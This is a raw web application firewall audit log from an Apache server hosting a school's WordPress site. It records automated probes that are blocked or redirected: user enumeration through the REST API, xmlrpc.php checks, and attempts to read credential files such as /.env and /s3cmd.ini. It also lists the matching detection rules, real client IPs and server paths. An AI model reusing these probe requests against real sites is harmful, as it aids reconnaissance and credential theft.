Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c0aba234-Z-- --fec64b51-A-- [17/May/2025:14:27:50 +0700] aCg6dnyxdQCiyU1ENFcu5gAAAAE 103.236.140.4 58446 103.236.140.4 8181 --fec64b51-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 181.205.21.50 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 181.205.21.50 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --fec64b51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fec64b51-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747466870776785 2911 (- - -) Stopwatch2: 1747466870776785 2911; combined=1273, p1=450, p2=791, p3=0, p4=0, p5=31, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fec64b51-Z-- --12f15929-A-- [17/May/2025:14:46:34 +0700] aCg-2nyxdQCiyU1ENFcu_AAAAA8 103.236.140.4 58538 103.236.140.4 8181 --12f15929-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --12f15929-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12f15929-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747467994383872 3287 (- - -) Stopwatch2: 1747467994383872 3287; combined=1450, p1=506, p2=911, p3=0, p4=0, p5=32, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12f15929-Z-- --c5762622-A-- [17/May/2025:14:46:39 +0700] aCg-33yxdQCiyU1ENFcu_gAAABQ 103.236.140.4 58542 103.236.140.4 8181 --c5762622-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.113.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.113.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c5762622-C-- demo.sayHello --c5762622-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c5762622-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747467999854462 4714 (- - -) Stopwatch2: 1747467999854462 4714; combined=3674, p1=430, p2=3045, p3=24, p4=25, p5=88, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c5762622-Z-- --a732a947-A-- [17/May/2025:14:56:10 +0700] aChBGhKi5m5upc8uMd6mzgAAAMo 103.236.140.4 58584 103.236.140.4 8181 --a732a947-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.200 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a732a947-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a732a947-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747468570074100 2863 (- - -) Stopwatch2: 1747468570074100 2863; combined=1254, p1=437, p2=786, p3=0, p4=0, p5=30, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a732a947-Z-- --31ff914d-A-- [17/May/2025:14:56:14 +0700] aChBHnyxdQCiyU1ENFcvCQAAAA4 103.236.140.4 58588 103.236.140.4 8181 --31ff914d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.174.200 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.174.200 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --31ff914d-C-- demo.sayHello --31ff914d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --31ff914d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747468574886088 4612 (- - -) Stopwatch2: 1747468574886088 4612; combined=3581, p1=453, p2=2926, p3=24, p4=25, p5=90, sr=84, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --31ff914d-Z-- --c225f137-A-- [17/May/2025:14:56:50 +0700] aChBQnyxdQCiyU1ENFcvCgAAAA8 103.236.140.4 58592 103.236.140.4 8181 --c225f137-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --c225f137-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c225f137-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747468610922359 3358 (- - -) Stopwatch2: 1747468610922359 3358; combined=1424, p1=490, p2=902, p3=0, p4=0, p5=31, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c225f137-Z-- --118d8d29-A-- [17/May/2025:14:56:58 +0700] aChBShKi5m5upc8uMd6m0AAAAM0 103.236.140.4 58598 103.236.140.4 8181 --118d8d29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.203.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.203.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --118d8d29-C-- demo.sayHello --118d8d29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --118d8d29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747468618146904 4613 (- - -) Stopwatch2: 1747468618146904 4613; combined=3598, p1=454, p2=2912, p3=24, p4=24, p5=105, sr=65, sw=79, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --118d8d29-Z-- --cbecdc00-A-- [17/May/2025:15:03:00 +0700] aChCtHyxdQCiyU1ENFcvEgAAAAk 103.236.140.4 58636 103.236.140.4 8181 --cbecdc00-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.185 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cbecdc00-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cbecdc00-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747468980938486 2866 (- - -) Stopwatch2: 1747468980938486 2866; combined=1243, p1=425, p2=780, p3=0, p4=0, p5=37, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cbecdc00-Z-- --33ecc119-A-- [17/May/2025:15:03:05 +0700] aChCuRKi5m5upc8uMd6m0wAAANE 103.236.140.4 58640 103.236.140.4 8181 --33ecc119-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.92.185 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.92.185 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --33ecc119-C-- demo.sayHello --33ecc119-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --33ecc119-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747468985040031 5954 (- - -) Stopwatch2: 1747468985040031 5954; combined=4362, p1=567, p2=3566, p3=37, p4=36, p5=93, sr=72, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33ecc119-Z-- --e1365118-A-- [17/May/2025:15:11:08 +0700] aChEnOm4kjNN-hEbWjJGjgAAAEM 103.236.140.4 59314 103.236.140.4 8181 --e1365118-B-- GET /s3cmd.ini HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 216.81.248.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 216.81.248.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Redmi Note 7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36 Accept-Charset: utf-8 --e1365118-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e1365118-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747469468300542 2494 (- - -) Stopwatch2: 1747469468300542 2494; combined=898, p1=422, p2=445, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e1365118-Z-- --36bb5669-A-- [17/May/2025:16:15:51 +0700] aChTx3yxdQCiyU1ENFcy3wAAABU 103.236.140.4 35166 103.236.140.4 8181 --36bb5669-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 171.232.108.54 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 171.232.108.54 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --36bb5669-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36bb5669-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747473351346584 2903 (- - -) Stopwatch2: 1747473351346584 2903; combined=1252, p1=421, p2=792, p3=0, p4=0, p5=39, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36bb5669-Z-- --1eba4174-A-- [17/May/2025:17:05:54 +0700] aChfgnyxdQCiyU1ENFc0rAAAAAM 103.236.140.4 41700 103.236.140.4 8181 --1eba4174-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.120.165.162 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.120.165.162 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1eba4174-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1eba4174-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747476354471772 2218 (- - -) Stopwatch2: 1747476354471772 2218; combined=1214, p1=392, p2=793, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1eba4174-Z-- --6594f11e-A-- [17/May/2025:17:48:17 +0700] aChpcem4kjNN-hEbWjJY2QAAAEU 103.236.140.4 45064 103.236.140.4 8181 --6594f11e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 217.219.35.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 217.219.35.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --6594f11e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6594f11e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747478897059137 2882 (- - -) Stopwatch2: 1747478897059137 2882; combined=1307, p1=430, p2=844, p3=0, p4=0, p5=33, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6594f11e-Z-- --a90e8b67-A-- [17/May/2025:17:49:48 +0700] aChpzOm4kjNN-hEbWjJZNAAAAFA 103.236.140.4 46512 103.236.140.4 8181 --a90e8b67-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 189.89.186.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 189.89.186.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a90e8b67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a90e8b67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747478988115863 2416 (- - -) Stopwatch2: 1747478988115863 2416; combined=1064, p1=363, p2=677, p3=0, p4=0, p5=24, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a90e8b67-Z-- --f9f92963-A-- [17/May/2025:18:29:35 +0700] aChzHwTOsBn9MSWb6WKP8QAAAIc 103.236.140.4 54262 103.236.140.4 8181 --f9f92963-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.60.236.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.60.236.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --f9f92963-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9f92963-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747481375936085 3004 (- - -) Stopwatch2: 1747481375936085 3004; combined=1402, p1=462, p2=906, p3=0, p4=0, p5=33, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9f92963-Z-- --04dafe1d-A-- [17/May/2025:18:38:08 +0700] aCh1IHyxdQCiyU1ENFdS-gAAAAY 103.236.140.4 34994 103.236.140.4 8181 --04dafe1d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --04dafe1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --04dafe1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747481888559599 1137 (- - -) Stopwatch2: 1747481888559599 1137; combined=392, p1=349, p2=0, p3=0, p4=0, p5=43, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --04dafe1d-Z-- --dc19b301-A-- [17/May/2025:18:38:13 +0700] aCh1JRKi5m5upc8uMd7DVgAAANc 103.236.140.4 35068 103.236.140.4 8181 --dc19b301-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.177 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.177 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --dc19b301-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc19b301-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747481893186462 899 (- - -) Stopwatch2: 1747481893186462 899; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
